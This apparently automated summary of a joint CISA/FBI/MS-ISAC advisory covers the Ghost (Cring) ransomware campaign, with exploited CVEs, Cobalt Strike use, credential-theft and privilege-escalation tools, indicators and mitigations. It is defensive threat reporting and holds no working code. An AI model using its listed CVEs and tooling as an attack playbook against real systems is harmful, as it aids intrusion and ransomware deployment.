Full Report
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the Federal Bureau of Investigation (FBI) and... The post CISA, FBI, MS-ISAC warn of Ghost ransomware exploiting outdated systems across critical infrastructure appeared first on Industrial Cyber.
Analysis Summary
# Incident Report: Ghost (Cring) Ransomware Campaign Exploiting Unpatched Public-Facing Services
## Executive Summary
This report summarizes joint advisories concerning the "Ghost" ransomware group (also known as Cring, Crypt3r, etc.), active since early 2021, conducting widespread attacks globally for financial gain. The primary vector involved exploiting known vulnerabilities (CVEs) in unpatched internet-facing software and firmware. The campaign led to access across critical infrastructure, educational, healthcare, and government sectors, primarily relying on Cobalt Strike for command and control and rapid ransomware deployment, often within hours of initial compromise.
## Incident Details
- **Discovery Date:** Early 2021 (Start of activity noted in advisory)
- **Incident Date:** Ongoing, observed since early 2021
- **Affected Organization:** Organizations across more than 70 countries, including critical infrastructure, schools/universities, healthcare, government, religious institutions, technology, and manufacturing companies.
- **Sector:** Broad scope including Critical Infrastructure, Education, Healthcare, Government, Technology, Manufacturing.
- **Geography:** Global, with actors located in China.
## Timeline of Events
### Initial Access
- **Date/Time:** Beginning early 2021. Rapid compromise observed, with ransomware deployed within the same day as initial compromise in multiple instances.
- **Vector:** Exploitation of unpatched, internet-facing software and firmware (CVEs).
- **Details:** Attackers leveraged publicly available code to exploit unpatched CVEs on exposed servers. Specific vulnerabilities targeted include those related to Fortinet FortiOS (CVE-2018-13379), Adobe ColdFusion, Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (ProxyShell chain: CVE-2021-34473, etc.).
### Lateral Movement
- **Details:** After initial access, a web shell was uploaded. Attackers then used Windows Command Prompt/PowerShell to download and execute Cobalt Strike Beacon. Limited lateral movement observed, as the actors typically spent only a few days on victim networks before executing the final payload.
### Data Exfiltration/Impact
- **Details:** Primary impact was system encryption via ransomware (using executables like Cring.exe, Ghost.exe). Ransom notes threatened data sale, but CISA/FBI observed *limited* exfiltration of substantial data (like IP or PII). Data staging sometimes utilized Mega[dot]nz or web shells.
### Detection & Response
- **Details:** Detection relies on monitoring for Cobalt Strike Beacon activity, web shells, and exploiting IOCs/TTPs shared via CISA advisories. Response actions are mitigation-focused based on the CPGs.
## Attack Methodology
- **Initial Access:** Exploitation of public-facing application vulnerabilities (CVE exploitation) on outdated software/firmware.
- **Persistence:** Not a major focus; actors typically spend only a few days. Sporadically created new local/domain accounts or changed existing passwords. In 2024, observed deploying web shells.
- **Privilege Escalation:** Used built-in Cobalt Strike functions ('hashdump') or open-source tools like ‘SharpZeroLogon,’ ‘SharpGPPPass,’ ‘BadPotato,’ and ‘GodPotato,’ often leveraging stolen process tokens.
- **Defense Evasion:** Used Cobalt Strike functions to list running processes and frequently ran commands to **disable Windows Defender**.
- **Credential Access:** Used Cobalt Strike function 'hashdump' or Mimikatz to collect passwords and/or password hashes.
- **Discovery:** Used Cobalt Strike to review running processes to identify existing security controls (AV).
- **Lateral Movement:** Limited, but included pivoting using stolen credentials/hashes.
- **Collection:** Limited downloading of data to Cobalt Strike Team Servers; staging via Mega[dot]nz noted in minimal instances.
- **Exfiltration:** Limited in scope; focused more on disruption than data theft.
- **Impact:** Ransomware encryption (variable file extensions and ransom note text).
## Impact Assessment
- **Financial:** Not explicitly quantified, but implied due to ransomware execution across numerous sectors.
- **Data Breach:** Limited PII or IP exfiltration reported, though ransom notes threatened sale of exfiltrated data.
- **Operational:** Significant operational disruption due to rapid ransomware deployment.
- **Reputational:** Affected all organization types, including critical infrastructure and government agencies.
## Indicators of Compromise
- **Network indicators:** Reliance on Cobalt Strike C2 using HTTP/HTTPS protocols.
- **File indicators:** Ransomware executables such as Cring[dot]exe, Ghost[dot]exe, ElysiumO[dot]exe, and Locker[dot]exe.
- **Behavioral indicators:** Deployment of web shells, disabling of Windows Defender, use of specific publicly available exploitation modules (e.g., for ProxyShell).
## Response Actions
Response actions are based on official recommendations aligned with CISA/NIST Cross-Sector Cybersecurity Performance Goals (CPGs).
- **Containment measures:** Immediate segmentation of infected devices; identification and isolation of compromised C2 channels.
- **Eradication steps:** Complete removal of web shells, Cobalt Strike Beacon implants, and any unauthorized accounts.
- **Recovery actions:** Restoration from known-good, segmented backups; comprehensive patching of all exploited and associated systems.
## Lessons Learned
- **Key takeaways:** Unpatched, internet-facing software/firmware remains a primary and successful entry point for ransomware operations (responsible for about one-third of successful compromises). The speed of execution (same-day impact) mandates extremely fast remediation cycles.
- **What could have been done better:** Organizations frequently fail to maintain perfect patching hygiene, enabling opportunistic exploitation by groups like Ghost/Cring.
## Recommendations
- **Prevention measures for similar incidents:**
1. **Prioritize Patching:** Dedicate significant resources to timely patching of operating systems, software, and firmware for internet-facing services.
2. **System Backups:** Maintain regular, segmented, and offline backups known to be recoverable.
3. **Network Segmentation:** Implement strict segmentation to prevent internal device pivoting after initial compromise.
4. **MFA Enforcement:** Require phishing-resistant Multi-Factor Authentication (MFA) for all privileged and email service accounts.
5. **Application Control:** Implement application allowlisting for scripts, applications, and network traffic to block unauthorized execution of malware like Cobalt Strike.
6. **Security Monitoring:** Enhance monitoring to identify and alert on abnormal network activity, PowerShell misuse, and specific defense evasion commands (e.g., AV disabling).
7. **Email Security:** Harden email gateways using DMARC, DKIM, and SPF.